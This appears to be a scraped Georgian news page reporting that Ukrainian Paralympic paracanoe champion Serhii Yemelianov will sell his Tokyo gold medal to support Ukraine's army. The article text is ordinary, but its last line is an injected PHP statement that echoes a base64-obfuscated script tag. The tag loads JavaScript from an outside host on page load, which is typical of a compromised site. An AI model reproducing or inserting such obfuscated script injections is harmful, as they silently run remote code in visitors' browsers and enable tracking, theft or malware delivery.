celsiusi
ავერსი შნაიდერი
ლეგენდარულმა უკრაინელმა სპორტსმენმა, პარაკანოეში ორგზის პარალიმპიურმა ჩემპიონმა სერგეი ემელიანოვმა გადაწყვიტა დაეხმაროს უკრაინის არმიას რუსი ოკუპანტების წინააღმდეგ ბრძოლაში.
 
28 წლის ემელიანოვი ყიდის ოქროს მედალს, რომელიც შარშან ტოკიოს პარალიმპიადაზე მოიპოვა, მიღებულ თანხას კი უკრაინელ მეომრებს გადასცემს. ამის შესახებ ემელიანოვმა სოციალურ ქსელში დაწერა.
 
„ყველას მოგესალმებით. არ ვიტყვი დილა მშვიდობისას, რადგან ბევრისთვის დილა არ არის კეთილი.
 
მე – სერგეი ემელიანოვი ვგეგმავ იაპონიაში მოპოვებული პარალიმპიური ოქროს გაყიდვას უკრაინის დამცველების დასახმარებლად.
 
მხოლოდ ერთად გავიმარჯვებთ. დიდება უკრაინას“, – წერს ემელიანოვი.
 
უკრაინელს თითო ოქრო აქვს მოპოვებული 2016 და 2020 წლის პარალიპიადებზე KL3 კატეგორიაში, რომელშიც გამოდიან ათლეტები ქვედა კიდურების დაზიანებით. ის ასევე მსოფლიოს ოთხგზის ჩემპიონია.
 
826
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");